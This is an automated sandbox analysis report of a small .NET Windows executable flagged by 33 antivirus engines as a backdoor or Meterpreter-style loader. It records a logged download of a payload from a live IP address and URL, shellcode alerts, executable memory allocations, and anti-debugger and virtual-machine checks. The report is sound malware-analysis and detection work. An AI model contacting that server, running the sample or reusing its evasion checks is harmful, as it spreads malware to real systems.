Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 17, 2024, 10:33 a.m.	Oct. 17, 2024, 10:42 a.m.

Size	5.5KB
Type	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
MD5	`28b7505a051cf6a0e6ee179ef76be154`
SHA256	`1895cb39da800c897240669ce9a3e39cdf129b89c05f642c98ed324dad32fdb5`
CRC32	`DA7A042C`
ssdeep	`96:HnGS2T9v7+4fzeTJUA57EF4gVp9VkKvKPSvIazNt:ARyqCem7eVp9VkKvMSvIc`
PDB Path	C:\Users\jack\source\repos\ConsoleApp50\ConsoleApp50\obj\Release\ConsoleApp50.pdb
Yara	PE_Header_Zero - PE File Signature IsPE64 - (no description)

xxx.exe "C:\Users\test22\AppData\Local\Temp\xxx.exe"
2552

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
136.243.104.235	Active	Moloch
156.245.12.57	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2022640	ET MALWARE PE EXE or DLL Windows file download Text M2	A Network Trojan was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected
TCP 156.245.12.57:8000 -> 192.168.56.101:49163	2012252	ET SHELLCODE Common 0a0a0a0a Heap Spray String	Executable code was detected

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 17, 2024, 10:26 a.m.			0	0
IsDebuggerPresent Oct. 17, 2024, 10:26 a.m.			0	0

This executable has a PDB path (1 event)

pdb_path

C:\Users\jack\source\repos\ConsoleApp50\ConsoleApp50\obj\Release\ConsoleApp50.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 17, 2024, 10:26 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://156.245.12.57:8000/1222.txt

Performs some HTTP requests (1 event)

request

GET http://156.245.12.57:8000/1222.txt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 52 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a31000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40cb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 2555904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002400000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000025f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a32000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a34000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a34000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a34000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3a34000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9427a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9432c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94356000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94330000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9428c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9428a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9427b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9429b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9429d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94272000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942cd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9428b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 17, 2024, 10:26 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 17, 2024, 10:26 a.m.	flags: 15 family: 0		111	0

Communicates with host for which no DNS query was performed (2 events)

host	136.243.104.235
host	156.245.12.57

Detects the presence of Wine emulator (1 event)

Time & API	Arguments	Status	Return	Repeated
LdrGetProcedureAddress Oct. 17, 2024, 10:27 a.m.	ordinal: 0 function_address: 0x000007fefd6b7a50 function_name: wine_get_version module: ntdll module_address: 0x0000000076d30000		-1073741511	0

File has been identified by 33 AntiVirus engines on VirusTotal as malicious (33 events)

Bkav	W64.AIDetectMalware.CS
Lionic	Trojan.Win32.Agent.Y!c
Cynet	Malicious (score: 100)
Skyhigh	Artemis!Trojan
Sangfor	Backdoor.Win32.Agent.Vuls
CrowdStrike	win/malicious_confidence_90% (D)
BitDefender	Trojan.GenericKD.74327216
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Generik.THYAWK
APEX	Malicious
Avast	Win64:MalwareX-gen [Trj]
Kaspersky	HEUR:Backdoor.MSIL.Agent.gen
MicroWorld-eScan	Trojan.GenericKD.74327216
Emsisoft	Trojan.GenericKD.74327216 (B)
McAfeeD	ti!1895CB39DA80
CTX	exe.trojan.artemis
SentinelOne	Static AI - Malicious PE
FireEye	Generic.mg.28b7505a051cf6a0
Google	Detected
Kingsoft	MSIL.Backdoor.Agent.gen
Microsoft	Program:Win32/Wacapew.C!ml
ZoneAlarm	HEUR:Backdoor.MSIL.Agent.gen
GData	Trojan.GenericKD.74327216
Varist	W64/Rozena.CM.gen!Eldorado
McAfee	Artemis!28B7505A051C
DeepInstinct	MALICIOUS
Malwarebytes	Generic.Malware/Suspicious
Ikarus	Win32.Outbreak
huorong	Backdoor/Meterpreter.ak
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	PossibleThreat
AVG	Win64:MalwareX-gen [Trj]
Paloalto	generic.ml

xxx.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All